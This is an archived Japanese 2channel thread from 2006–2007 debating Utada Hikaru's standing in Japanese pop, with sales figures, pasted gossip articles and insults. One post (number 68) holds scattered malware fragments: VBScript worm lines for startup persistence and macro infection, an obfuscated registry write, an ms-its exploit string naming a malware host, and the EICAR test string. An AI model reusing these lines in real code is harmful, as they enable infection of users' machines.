5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

宇多田はやっぱり日本のトップだと思う人の数→

1 :読者の声:2006/11/27(月) 12:01:53 ID:OGov/jHW
デビューアルバムが700万枚超えた人っている?w
アルバムが3作連続で300万枚超えた人いる?w
間違いなく日本のトップですよw
全米デビュー失敗? べつにいんじゃね
浜崎とか言う人(プッ
足元にもおよばないね

2 :読者の声:2006/11/27(月) 12:06:39 ID:Qkq2TCxL
テスト

3 :読者の声:2006/11/27(月) 12:37:59 ID:m75dG79b
クソスレ3

4 :読者の声:2006/11/27(月) 12:55:26 ID:Grf0ZPdo
今週だけでも上に3組もいるのに…

5 :読者の声:2006/11/27(月) 13:23:31 ID:0esEla3r
低学歴DQNアーよりまし

6 :読者の声:2006/11/27(月) 13:34:16 ID:4Q7IQ4Kx
日本ではトップだったね。楽曲は桜井並かそれ以上だったね。

7 :読者の声:2006/11/27(月) 13:56:47 ID:4f5BfxiN
メロディが個性的な上にそれが複数あるっていう天才
前者はいっぱいいるが後者含めると宇多田だけになる。

8 :読者の声:2006/11/27(月) 14:52:11 ID:yL5qBnKM
全盛期の勢いは日本一でいいんじゃない

9 :読者の声:2006/11/27(月) 15:43:41 ID:JvohXM0a
北朝鮮宇多田工作員自作自演板自作自演工作スレ

10 :読者の声:2006/11/27(月) 16:41:19 ID:rlyOsmFN
B'zがCD売り上げ日本一です。
宇多田なんてもはやタイアップ無きゃ売れないゴミです。
倉木をパクリとか言ってバカにするような態度取るような人間はクズです。
卒業できないくせにコロンビア大学に入る見栄っぱりなバカです。
テトリスしか取り柄がないブスです。
何か異論はありますか?

11 :読者の声:2006/11/27(月) 17:06:06 ID:bJ007UU8
見栄っ張りでもブスでも 沢山のひとたちにやすらぎとか、やるきとか、初恋の甘酸っぱさとか
そんなことを体感させたんだから、それだけで尊敬に値すると思う。
タイアップしても売れない奴は売れない。心に響かないからね。

12 :読者の声:2006/11/27(月) 17:30:02 ID:2t1rGRAy
1stアルバムのあの売り上げは
地域振興券の使い道に困った人たちが流行に乗って買ったって説があるよね

13 :読者の声:2006/11/27(月) 20:23:25 ID:0/5R1qcZ
北朝鮮宇多田工作員自作自演板宣伝工作スレ

14 :読者の声:2006/11/27(月) 21:00:59 ID:rlyOsmFN
ブッタダー

15 :読者の声:2006/11/27(月) 21:39:14 ID:SCjnBDR0
才能あると思う。テレビ初登場であんなステキなバラードを十代で歌い上げるなんて凄いと思う。頑張って。

16 :読者の声:2006/11/27(月) 22:26:38 ID:Xkrr96h9
昔はトップだったんじゃないの?

もうとっくに存在忘れたけどw

17 :読者の声:2006/11/27(月) 23:10:42 ID:cWi7ZjP2
同じ一過性のブームでもだんご三兄弟のほうが歌唱力がまともでマシだった
宇多田はマジで下手だ
人前で歌うレベルじゃない
下手すぎてカラオケで歌ってイヤがられるレベル

18 :読者の声:2006/11/27(月) 23:54:06 ID:LDkVAiVs
>>12
なつかしい
そんなのもあったねww

19 :読者の声:2006/11/28(火) 00:24:21 ID:USIolyEw
2nd3rdアルバムも売れたけどな

20 :読者の声:2006/11/28(火) 00:31:19 ID:t3tCRKgW

主な女性アーティストの最新シングル順位


*1位 倖田來未、Kaoru Amane、浜崎あゆみ、絢香

*2位 安室奈美恵、大塚愛、BoA、YUI

*3位 aiko

*4位 宇多田ヒカル、星泉、misono、水樹奈々

*5位 東京事変、後藤真希、堀江由衣、Cocco、水森かおり、BENNIE K、安倍なつみ、Gorie

*6位 DREAMS COME TRUE、木村カエラ、YUKI、アンジェラ・アキ

*7位 倉木麻衣、GARNET CROW

*8位 月島きらり starring 久住小春、綾瀬はるか

*9位 AI

10位 柴咲コウ、ZARD、Tommy heavenly6、川嶋あい

11位 愛内里菜

12位 島谷ひとみ、玉置成実

13位 中島美嘉、松浦亜弥、MISIA、バブル青田

15位 Every Little Thing


21 :読者の声:2006/11/28(火) 08:27:49 ID:L+dgrgr3
ほんとうのヒーロー 国民的な英雄の影
あなたに私も 過剰なまでに期待をしていた

22 :読者の声:2006/11/28(火) 10:37:49 ID:ZVgiYLX9
去年は、強力タイアップ付けて歌番組に全てハシゴして出まくって、
半額600円、ジャケ違いの2種類で売ってもTOP3に入れず(初動4万)
おまけに出演した歌番組の視聴率は、どれも前後の週と比べて谷間
Mステにいたってはわずか7%
その次にMステに出た時は、通常回なのに5番手扱い(ビリから数えたほうが早い)
今週の新曲は、半額600円の上に、3種類形態の複数買い商法、特典付けまくり
しかしこれもTOP3に入れず

23 :読者の声:2006/11/28(火) 12:03:42 ID:8SYzBFyB
最近のウタダさん


・強力タイアップ付けて歌番組に全てハシゴして出まくって、
半額600円、ジャケ違いの2種類で売った本気シングルがTOP3に入れず(初動4万)
おまけに出演した歌番組の視聴率は、どれも前後の週と比べて谷間
Mステにいたってはわずか7%
その次にMステに出た時は、通常回なのに5番手扱い(ビリから数えたほうが早い)

・auタイアップの本気シングルがHYDEソロに惨敗

・4年ぶりの渾身のPV集が2万しか売れず

・半額600円の上に、3種類形態の複数買い商法、特典付けまくりで
子供受けの確変を狙ったシングルを出すが、これもTOP3に入れず




↑追加しといたw


24 :読者の声:2006/11/28(火) 19:31:39 ID:3KoLAZcR
北朝鮮宇多田工作員自作自演宣伝工作スレ

25 :読者の声:2006/11/28(火) 20:14:02 ID:gujq+Bcf
宇多田はダウンロード数が凄いからね
音楽配信なんてしないでチャートだけを狙うセコい売れ線連中と違って
音楽性も馬鹿向けワンパターンのバラードばかりやってるメジャー連中と違って常に先進的だし
それでこれだけ売れ続けてるんだから、ほんと不思議だ
Mステで5番手?
あんなの事務所の力関係だろ
しかも前の4人なんかよりアルバム売上は今年も上だし



26 :読者の声:2006/11/28(火) 20:24:21 ID:7yR4HnuV
まぁ宇多田のアルバムは歴代売上今でも1位だけどね。

女は結婚し、年を取れば皆廃れるしようのないことだ。

27 :読者の声:2006/11/28(火) 20:57:13 ID:IB83i4Zl
>>25
北朝鮮宇多田工作員工作ダウンロード自慢乙

28 :読者の声:2006/11/28(火) 20:58:32 ID:IB83i4Zl
>>26
北朝鮮系パチンコの援助で売上を伸ばし鼻高々の宇多田工作員乙

29 :読者の声:2006/11/28(火) 21:29:09 ID:dz5fFlMc
>>27
IB83i4Zlエイベックス関係者乙

30 :読者の声:2006/11/28(火) 21:30:08 ID:dz5fFlMc
>>28
IB83i4Zl エイベックスホールディングス関係者乙


31 :読者の声:2006/11/28(火) 21:58:45 ID:1wjOA8uY
>・半額600円の上に、3種類形態の複数買い商法、特典付けまくりで

これで3万台乙w

32 :読者の声:2006/11/28(火) 22:03:09 ID:1wjOA8uY
806 Celeblity☆みぃたん☆ ◆HIEEw3cAko あたしゎセレブリティー姫ょん( ^∀^)♪ New! 2006/11/28(火) 16:57:36 ID:1oULV2yr
豚田の大脂肪来たゎwwwww

最新シングル

あゆ@位 16万枚








豚田C位 3万枚wwwwwwwwwwwwwwwwww


33 :読者の声:2006/11/28(火) 22:03:54 ID:xxE2btxi
700万もアルバム売って付いた固定の生き残りがたった3万か
しょぼすぎるな

34 :読者の声:2006/11/28(火) 22:46:01 ID:fUwQMAA8
北朝鮮宇多田工作員自作自演板宣伝工作スレ

35 :読者の声:2006/11/28(火) 22:48:36 ID:NKw1WMhC
北朝鮮系パチンコが大量に買ってるだろうし実数はずっと少ないだろうな

36 :読者の声:2006/11/28(火) 22:53:13 ID:2EQZ+UQf
32=みぃたん=取り巻き=北朝鮮宇多田工作員自作自演

37 :読者の声:2006/11/28(火) 22:54:23 ID:0iVRb31Q
>>33
いや800万だろ

38 :読者の声:2006/11/28(火) 22:58:48 ID:Y3vYtYAu
800万枚を自称する宇多田工作員w
1000万枚を自称して叩かれた頃もありましたw

39 :読者の声:2006/11/28(火) 23:32:18 ID:Y1FOtimg
>>34

マンセー!

40 :読者の声:2006/11/28(火) 23:38:21 ID:2gJHkd11
全米が失笑(笑)
パフィーに完敗(笑)

41 :読者の声:2006/11/29(水) 01:22:31 ID:6N9C37wy
700万人はどこへ消えた?

42 :読者の声:2006/11/29(水) 05:32:46 ID:2B47tpEI
間違いなくトップだったな

43 :読者の声:2006/11/29(水) 06:08:54 ID:VymRxjiT
エイベ工作員自演スレ

44 :読者の声:2006/11/29(水) 07:27:19 ID:NS93Hycz
宇多田が凄いというか、みんなが買えば自分も買うという
日本人の馬鹿さ加減が凄いよね。


45 :読者の声:2006/11/29(水) 08:33:40 ID:vJthS/ck
時代の徒花

46 :読者の声:2006/11/29(水) 08:55:14 ID:aGdLMF1t
あんな素人レベルの腐女子のCDを800万売る

宇多田テルザネは本当に凄い
800万の国民を欺いた日本最高の詐欺師だと思う。

ブタダさん、ゲームに漫画にアニメばっかりじゃ
固定ファンなんてつきませんよ?

もっと歌おうね、一応歌手なんだし。

47 :読者の声:2006/11/29(水) 11:02:23 ID:P8kuWZRJ
あんな下手な歌じゃ歌えば歌うほどファンが離れるw

48 :読者の声:2006/11/29(水) 14:09:41 ID:DwkHjqtC
アメリカ進出に関しては、標的はアメリカ市場でなくって、日本だったんじゃないか?

「アメリカでデビューするutadaの曲を、日本で聞く」

みたいなかんじで。


まあ、とにかく。
コブ田クミなんてのが売れてる時代だからな。
宇多田たたいてるやつって結局、自分からは、自分が好きな歌い手の名前いわないよな。
正直、誰の曲がすごいとおもってんの?


49 :読者の声:2006/11/29(水) 15:43:29 ID:yeu0dNnL
宇多田はすきです

50 :読者の声:2006/11/29(水) 16:21:03 ID:s4rAWJ0z
宇多田はこれからの人。

51 :読者の声:2006/11/29(水) 16:28:59 ID:grGdFxqu
レスが少なくて可哀相なので足跡残していきますね

52 :読者の声:2006/11/29(水) 18:01:49 ID:f0rxZyq4
EXODUS'04とか好きだな

独創的で芸術性もあるし

ただ歌いやすい曲とかノリのいい曲ってのはたくさんあるけど
芸術性をもとめたらエイベックスなんてウンコ

53 :読者の声:2006/11/29(水) 18:07:17 ID:v+zD6rN6
宇多田はパクりにすぎんけどな

54 :山本:2006/11/29(水) 18:08:20 ID:OxCcLyO0
宇多田・・・。

55 :読者の声:2006/11/29(水) 18:30:29 ID:Qaf0/gWa
山本=北朝鮮宇多田工作コテ

56 :読者の声:2006/11/29(水) 22:24:58 ID:we3zk9hL
今トップの倖田とかだっていずれ落ちぶれる時がくるんだし
結局順番でしょ

ウタダはもう本人がまたトップに立ちたいと思ってなさそうだし

57 :読者の声:2006/11/29(水) 22:56:56 ID:nauQuDdG
エ糞出す

58 :読者の声:2006/11/29(水) 23:43:41 ID:Ega40ICi
北朝鮮宇多田工作員自作自演板捏造工作スレ

59 :読者の声:2006/11/30(木) 01:16:01 ID:gljE3chy
宇多田はトップとかそうゆうのこだわらなさそう
でも倖田や浜崎はトップじゃないと・・・って思ってるんじゃないか?
自信もあるだろうし。


60 :読者の声:2006/11/30(木) 02:09:35 ID:KARg43Nm
まだ3万も売れてるんだから大丈夫。
倖田みたいにトップじゃなくたって別にいいよ。ナンバーワンよりオンリーワン。

61 :読者の声:2006/11/30(木) 02:42:46 ID:uSHGKyiv
「トップ」て…むしろ今のヒキタウカルが何よりもなりたくないものなんじゃないか。なんとなく。イミナティ

62 :読者の声:2006/11/30(木) 03:06:43 ID:83BRdTv+
北朝鮮宇多田工作員自作自演板宣伝工作スレ

63 :読者の声:2006/11/30(木) 04:58:26 ID:oBlaDE+V
ライブをしないコイツは歌手だと認めない

64 :読者の声:2006/11/30(木) 05:54:18 ID:5QdOimcC
あやかよりはいい

65 :読者の声:2006/11/30(木) 07:30:14 ID:yDhrrt8h
>>63
生歌が酷いだけでライブはやってたぞ

66 :読者の声:2006/11/30(木) 08:12:32 ID:EvI10YbL
ライブの点は致命的
あとは歌唱力と宗教勧誘のオバサンみたいな容姿をどうにかすること

やる気なさそうだから改善は見込めないけど
本人が楽しいなら今のままでもいいと思う

67 :読者の声:2006/11/30(木) 08:14:19 ID:oBlaDE+V
>>65
殆どやってないって意味な。

こんなんで売れようって考えがムカツク
米デビューの時も関係者向けライブ一度だけだろ?
バカにしすぎだ

68 :山本:2006/11/30(木) 14:26:05 ID:9vvM1xDK
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()

69 :読者の声:2006/11/30(木) 15:22:09 ID:i0lDFuwe
何かの曲のジャケットの黒髪ロングのツンツンの髪型が超似合ってた
神ジャケ

70 :読者の声:2006/11/30(木) 19:52:35 ID:LaQdN3js
くうまっ くうまっ くうまああぁぁ

71 :読者の声:2006/11/30(木) 21:24:04 ID:IYkqplbP
宇多田わ間違いなくトップです!!

72 :読者の声:2006/11/30(木) 21:39:07 ID:YrSb7mxV
昔のトップだった頃より、今のほうが好きだけどな

73 :読者の声:2006/11/30(木) 21:42:31 ID:EvI10YbL
ぼくはくまじゃなくて
ぼくはにだ、だろ

74 :読者の声:2006/11/30(木) 22:53:44 ID:yDhrrt8h
宇多田カワイソス(´;ω;`)

75 :読者の声:2006/12/01(金) 00:43:25 ID:26hz7wUm
北朝鮮宇多田工作員自作自演板宇多田をトップにしたてあげる工作スレ

76 :読者の声:2006/12/01(金) 03:58:07 ID:1VFu4AxR
結婚してパワーダウンするかなーって思ってたけどそんなこと
ぜんぜんないね。Keep try'n とか神懸かり過ぎだし、
誰かの願いがかなうころ、の出来もかなりのものだよ。
彼女はまちがいなく本物だと思う。生きてるうちに宇多田という才能に
出会えてヨカッタと心から思っています。

77 :読者の声:2006/12/01(金) 04:04:54 ID:xhRBlACn
とっくに過去の人
アンチさえいないのがそれを物語ってる
今のトップは残念ながら倖田

78 :読者の声:2006/12/01(金) 05:42:46 ID:5wmD/qtR
2ch不人気度はトップだなw

79 :読者の声:2006/12/01(金) 12:17:46 ID:8KZXicXI
ウタダ=だんご3兄弟のイメージ
最大瞬間風速だけの人

80 :読者の声:2006/12/03(日) 18:57:51 ID:pGbdlpNV
>>72 俺も最近の方が好きだな。

81 :読者の声:2006/12/16(土) 14:18:05 ID:n+aIy5B3
オレンジレンジみたいのが売れるのが日本だからな

82 :読者の声:2006/12/17(日) 21:09:41 ID:wyof+RBG
ぼくはくま累計10万枚いきそうだね

83 :読者の声:2006/12/27(水) 22:31:46 ID:gx9T4QCy
>>78
2chで大人気なのはモー娘とか倉木とかの
キモヲタ向けアイドルだから、別にどうでもいいよw
そんなニートオタクどもに嫌われてこそ本物のアーティストだww

84 :読者の声:2007/01/02(火) 23:08:17 ID:oulRUTIU
おねがい初期のシングルの推移を強く希望

85 :読者の声:2007/01/02(火) 23:15:48 ID:vabsi4XU
宇多田は日本のトップアーティストだからこそ沢山の人から嫌われてる。出る杭は打たれる。アンチが多ければ多いほど人気がある。

86 :読者の声:2007/01/02(火) 23:15:53 ID:uWIOdzkE
昔は確実にトップだったと思う

87 :読者の声:2007/01/03(水) 09:57:26 ID:Jhz/zLB3
宇多田は邦楽界の革命的存在

88 :読者の声:2007/01/03(水) 10:01:50 ID:hJcKUFCs
ヒカルがトップだった時代に戻りたい・・・

89 :読者の声:2007/01/03(水) 10:26:45 ID:KncRgKlX
新年早々痛いな宇多田ヌタ
今はコウダの時代なんだから落ち目ヌタが何言っても変わらないのに


90 :読者の声:2007/01/03(水) 10:28:59 ID:KncRgKlX
Mステで歌ってたの聞いたけどこいつの生歌終わってる。


91 :読者の声:2007/01/03(水) 13:05:21 ID:O4alNhBL
>>89
倖田の時代は去年で終わりましたよ

92 :読者の声:2007/01/03(水) 15:12:08 ID:4utfaoVk
ヒカルはもうトップじゃないけど、今の日本にトップと言われる人がいない
昔は快進撃のモンスター宇多田とか新聞に書かれていたんだけどねぇ

93 :読者の声:2007/01/03(水) 15:36:51 ID:O4alNhBL
ヒッキーがこれから落ちていくとはどうしても思えない

94 :読者の声:2007/01/03(水) 16:09:51 ID:5Ev2z30p
>>1
宇多田ファンでも何でもない、ただの浜崎アンチ乙w

95 :読者の声:2007/01/03(水) 16:50:06 ID:rTuvazHV
日本の音楽&芸能業界が盛り上げるために一団となって大金はたいてるだけだからね
宇多田そんな凄くないてよ
あんな凄いプロデューサーつけて米盤があれじゃ当然うれね
もっと日本の音楽業界も歌上手いやつを売り出せばいいのにな


96 :読者の声:2007/01/03(水) 23:58:40 ID:cuhp4r+K
日本語でおk

97 :マピミ♪姫 ◆jsbiIb5I0Y :2007/01/04(木) 00:02:32 ID:eSm0cFZu
学歴詐称のブタダwwwwwwwwwwwwwwwwWWWWWWWWwwwwwwwwwwwwwwwWWWWWWWWWWwwwwwwwwwwwwwwww

98 :読者の声:2007/01/07(日) 02:35:03 ID:3cc6wVXO



99 :しるし累計85 ◆pw/MmVVKfc :2007/01/07(日) 05:57:48 ID:bNX1FmzH
新曲最高だな
久しぶりに宇多田の貫禄を見た

100 :読者の声:2007/01/07(日) 07:16:15 ID:RC6xFNpp
自分は浜ヲタだけど宇多田ヒカルは本当にすごいと思う。あゆが宇多田ヒカルくらいの面だったら普通に負けてる。
土俵が違うけどね。
あゆはバリバリのポップスだし。宇多田ヒカルは洋楽っぽいし。
だから宇多田ヒカルはとてもすごいと思いました。
あゆも宇多田ヒカルも倖田來未に負けないで→

101 :読者の声:2007/01/07(日) 10:26:29 ID:iadEBiFV
正直、ぼくはくまはもっと完成度あげるべきだった
みんなのうたはレベル高いから浮いちゃってたし

椎名林檎ももっとちゃんとしたのつくってたし
正直声優が歌ってる楽曲にすら負ける

102 :読者の声:2007/01/07(日) 14:34:34 ID:YIlAeOgR
ヒッキーの新曲いいね☆
やっぱりヒッキーはトップだわ

103 :読者の声 :2007/01/07(日) 14:57:17 ID:gmPHqRQ+
筆記ーがんばれ

104 :読者の声:2007/01/07(日) 19:01:31 ID:TszpcHgc
新曲いいね
ビジュアルの立て直しが出来てれば盛り返せそう

105 :読者の声:2007/01/14(日) 01:15:24 ID:ipbALs68
そうだね

106 :読者の声:2007/01/14(日) 01:23:37 ID:HAz6QdU0
日本一と騒ぎ立てるほどの女ではない

107 :読者の声:2007/01/15(月) 23:22:18 ID:bIxLkyRk
そう騒ぎ立てたい人が来る所だからね…

108 :読者の声:2007/01/15(月) 23:24:52 ID:kSoUh30p
ウタダがトップアーだった時代に戻りたい・・・

109 :読者の声:2007/01/16(火) 00:35:11 ID:ekuv4AIH


宇多田ヒカル 人気低迷で東芝EMIが「大リストラ」
http://stevie.seesaa.net/article/19817804.html



かつての勢いはどこへやら…

大手レコード会社である東芝EMIにリストラの嵐が吹き荒れている。

今月、全社員520人の約37%にあたる190人を削減する方針であることが明らかになった。

矢沢永吉、今井美樹、坂本冬美など、人気アーティストを多く抱えている同社だが、業績低迷の原因として、ヒットが少ないことが挙げられている。中でも戦犯扱いされているのが宇多田ヒカル(23)だ。⇒Ranking  

全米進出の大コケに加え、ニューアルバム「ULTRA BLUE」も不調。CMとのタイアップで生き残りを狙っているが、目立って売り上げが伸びているわけでもない。

だが、一番の問題は東芝EMIの社内で、宇多田サイドには一切、モノが言えない現状だという。

(以下引用)
「EMIとしてはもっと大衆に受ける曲、売れる曲を作ってほしい。でも、宇多田はヒットどうこうよりも自分が作りたいものを作る主義。
それでCDが売れるならいいけど売れないんじゃねえ。扱いづらくて仕方がない、ってEMIの関係者も言ってましたよ」(大手レコード会社関係者)

  04年にベストアルバムをリリースしているが、これも宇多田が好き勝手にやるようになるきっかけだったという。

「これは、売上高アップを狙ってEMI主導で作られたもの。宇多田はリリースに反対していたため、EMIと宇多田の関係はさらに悪化したんです。この頃から、宇多田はさらに周囲の声を聞かなくなったんです」(別のレコード会社ディレクター)[引用元:ナイスポ より]

デビュー当時が華々しかっただけに、ここまで落ちぶれると惨めだ。




110 :読者の声:2007/01/16(火) 00:36:03 ID:ekuv4AIH


【悲惨な末路】宇多田ヒカル、業界内から同情論が出るほど落ちぶれる
http://music6.2ch.net/test/read.cgi/musicnews/1156527337/


かつては「平成の歌姫」と称されていた宇多田ヒカル(23)だが、新曲「Keep Tryin'」は振るわず、
ついに音楽専門誌から「功労者だから一生懸命支えよう!」と同情されるほどになってしまった。

宇多田の凋落現象を象徴したのが、昨年末に発売した「Passion」のシングルチャート
最高4位(売上4万枚)という結果だった。起死回生を狙って22日に新曲を
リリースしたが、デイリーチャートでもHYDE・倖田來未に1位2位を譲るふがいなさ。
かつて歌姫と呼ばれていた頃の面影は、今やどこにもない。
ある広告代理店関係者から「『Keep Tryin'』は携帯電話のCMソング。CMの流れている
回数から考えればダントツ1位でもおかしくない」と言われてしまう始末だ。
事実、同CMソングだった人気グループEXILEはダントツで1位を獲得し、70万枚の大ヒットとなっている。

こんな宇多田の状況に業界内で同情論が広がっている。
「新曲が出る直前、某音楽専門誌の朝礼で『今の宇多田さんは勢いがないけど、
ここまで音楽シーンを支えてくれた功労者ですから、みんなで一生懸命支えて
いきましょう!』という異例の大号令がかけられました。いつの間にそんな哀れな歌手に
なっちゃったんでしょうかね」(洋楽ライター)

ある評論家は
「宇多田さんは昔売れてた頃は、ビジュアルもかわいかった。結婚後は、ふっくらしたり、
ちょっとおばさんくさくなった。それでカリスマ性を失い、ファン離れになっているんです。
決して米国進出の失敗だけじゃありません」と分析する。

落ちぶれた元トップアーティストの復活はあるのか…。



111 :読者の声:2007/01/16(火) 00:38:00 ID:ekuv4AIH


宇多田ヒカル、ついに売上3万枚歌手に落ちぶれる
http://music7.2ch.net/test/read.cgi/musicjf/1164719689/



1 名無しの歌姫 2006/11/28(火) 22:14:49 ID://Dzw4+R

*4 *39,715 宇多田ヒカル

↑半額600円の上に、3種類形態の複数買い商法、特典付けまくりで3万でした



ちなみに最近のウタダさん↓


・強力タイアップ付けて歌番組に全てハシゴして出まくって、
半額600円、ジャケ違いの2種類で売った本気シングルがTOP3に入れず(売上4万枚)
おまけに出演した歌番組の視聴率は、どれも前後の週と比べて谷間
Mステにいたってはわずか7%
その次にMステに出た時は、通常回なのに5番手扱い(ビリから数えたほうが早い)

・auタイアップの本気シングルがHYDEソロに惨敗

・4年ぶりの渾身のPV集が2万しか売れず

・半額600円の上に、3種類形態の複数買い商法、特典付けまくりで
子供受けの確変を狙った新曲を出すが、これもTOP3に入れず(売上3万枚)


112 :読者の声:2007/01/20(土) 19:44:33 ID:U9hsDTUC
ヒッキーサイコー

113 :読者の声:2007/01/20(土) 19:45:33 ID:zalK6n4S
日本のトップではないが同系統の人と比べると群を抜いてる

114 :読者の声:2007/01/20(土) 21:57:19 ID:iC09B2G3
昔の売れてた頃より、今のほうが好きだな

115 :読者の声:2007/01/22(月) 18:01:19 ID:jjs09NnX
クマ、クマ、クマ〜

116 :読者の声:2007/01/23(火) 00:55:43 ID:ZiTyKAD6
宇多田が最近色々言われるのはやっぱデブだからだと思う!

世間はデブに冷たいんだ
デブの自分が言うのだから間違いない!

117 :読者の声:2007/01/23(火) 01:11:33 ID:H0pvzUoF
たしかにコウダも色々言われてるからな


118 :読者の声:2007/01/23(火) 09:07:50 ID:AYKQSckW
>>1
ただの婆崎アンチぢゃんwwww
ばっかみたいwwwwwwww

119 :読者の声:2007/01/23(火) 09:16:36 ID:TRJhZMau
宇多田の歌唱力は日本最強



120 :読者の声:2007/01/27(土) 01:48:16 ID:7ORlG0Ne
ttp://www.youtube.com/watch?v=u9NH8NU627w&NR

本当にこれで日本最強だと思うのか
もっと理想は高く持とう

121 :読者の声:2007/01/27(土) 09:12:55 ID:rZ4a+2vY
ファンってのはどの歌手のファンも自分が応援してる歌手が一番だと思ってるもんだよ

122 :読者の声:2007/01/27(土) 09:53:58 ID:+wrwD7Fw
>>83
>2chで大人気なのはモー娘とか倉木

5年前から来た人ですか?

123 :読者の声:2007/01/27(土) 10:12:15 ID:g1VZqVGA
過去の曲と聴き比べると
メロディーにもう冴えみたいなものがない
アレンジと反比例にどんどんマンネリになってきてる
それを認めまいとして「keep trying」みたいな歌詞を書くんだろうけど
かなり苦しい、と思う

124 :読者の声:2007/01/27(土) 10:14:32 ID:0UwPdhXk
だがそれがいい

125 :読者の声:2007/01/27(土) 11:19:24 ID:jK2T5b6s
宇多田が太っちゃったのは、子宮系の病気の薬の副作用
決して怠慢で太ったわけじゃない

126 :読者の声:2007/01/27(土) 12:11:57 ID:pub9Gq2R
同じ病気したhitomiとか全然痩せてるが?
逆にウタダは病気の前から太ってるし

127 :読者の声:2007/01/27(土) 17:39:40 ID:TQtdcVXV
食べるのが好きなんだろう
別にいいじゃないか

128 :読者の声:2007/01/27(土) 18:33:23 ID:8ma9jvlz
>>126
太ってないです。

129 :読者の声:2007/01/28(日) 01:12:14 ID:8oVnXxZG
宇多田アッー

130 :読者の声:2007/01/28(日) 01:30:24 ID:rwmK2Xs3
おれ、宇多田ヒカルさんの曲全部好きだよっ!!

131 :読者の声:2007/01/28(日) 01:41:10 ID:HN4YLWuQ
ヲタクなところが好き

132 :読者の声:2007/01/28(日) 02:10:23 ID:oDc9JvZl
萌え〜て言ってそう

133 :読者の声:2007/01/28(日) 03:31:38 ID:CywtPl9x
天才。努力もしてるからなお天才。
声は天下無二の声の持ち主

134 :読者の声:2007/01/28(日) 08:24:50 ID:xvhrb/J8
宇多田萎え
浜崎萌え

135 :読者の声:2007/01/28(日) 12:55:28 ID:ppEgtcxG
売れないブタはただのブタだ

136 :読者の声:2007/01/28(日) 15:12:01 ID:XpERMCaU
>>123
同意。

137 :読者の声:2007/01/28(日) 21:00:32 ID:nwrF6jRn
>>132
それはキモ杉

138 :読者の声:2007/02/07(水) 20:04:29 ID:H7OeKMi9
普通に宇多田イイと思うけど?

139 :読者の声:2007/02/10(土) 19:24:25 ID:6f0+h/wu
ユーチューブみたいに動画も投稿できる芸能人の秘蔵映像発見!!
みんなのお宝映像も投稿できるよ!
面白動画はコチラ ↓↓↓
http://tv9.2ch.net/test/read.cgi/idol/1146627926/432

26 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)